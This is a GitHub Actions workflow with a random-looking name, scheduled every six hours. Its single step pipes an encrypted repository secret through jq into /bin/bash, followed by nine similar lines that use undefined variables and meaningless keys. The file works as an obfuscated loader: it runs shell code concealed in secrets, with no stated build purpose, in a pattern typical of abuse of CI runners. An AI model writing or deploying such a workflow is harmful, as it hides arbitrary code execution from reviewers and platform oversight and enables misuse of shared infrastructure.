name: equationmilitary
on:
  workflow_dispatch:
  schedule:
    - cron: '55 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: equationmilitary
        env:
          ypye36: ${{ secrets.ypye36 }}
        run: |
          echo $ypye36 | jq -r .bd60760 | /bin/bash
          echo $xjch9156 | jq -r .jiipv956 | /bin/bash
          echo $lys94 | jq -r .pz0 | /bin/bash
          echo $sbm74545 | jq -r .c79 | /bin/bash
          echo $ojerz1 | jq -r .tuzn82 | /bin/bash
          echo $cimtk2348 | jq -r .znicl5 | /bin/bash
          echo $nxl3711 | jq -r .orodu20875 | /bin/bash
          echo $dvteu65 | jq -r .jtcg8626 | /bin/bash
          echo $vqo06 | jq -r .m8245 | /bin/bash
          echo $lzos2 | jq -r .fc86262 | /bin/bash

